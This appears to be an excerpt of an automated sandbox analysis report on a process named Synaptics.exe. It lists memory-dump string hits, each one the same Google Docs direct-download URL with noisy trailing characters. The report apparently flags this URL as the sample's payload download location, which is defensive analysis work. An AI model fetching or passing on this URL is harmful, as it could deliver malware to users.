                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL:
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMa
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNM
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO;
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOITG%
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOY
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOa
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP~KF
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ?
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQg;DB
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSJXD
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSU~u
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT;
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTa6F
                              Source: Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadThe
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTw
                              Source: Synaptics.exe, 00000003.00000003.2152405545.0000000000728000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUb
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUn=
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUs
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV7_F%
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVD
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVDo
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVersiI
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVf8EY
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWK
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWa
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWg
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXI
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXxSD
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY9h
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY:
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ0SE
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZG
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZa
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_HdF1
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada;
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaJF
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad1
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadalifoh
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadate
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaw
                              Source: Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbe
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-cn
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcFh
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcIhG$
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelleK
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcf-EX
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadclos
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.c
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcs
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcuriC
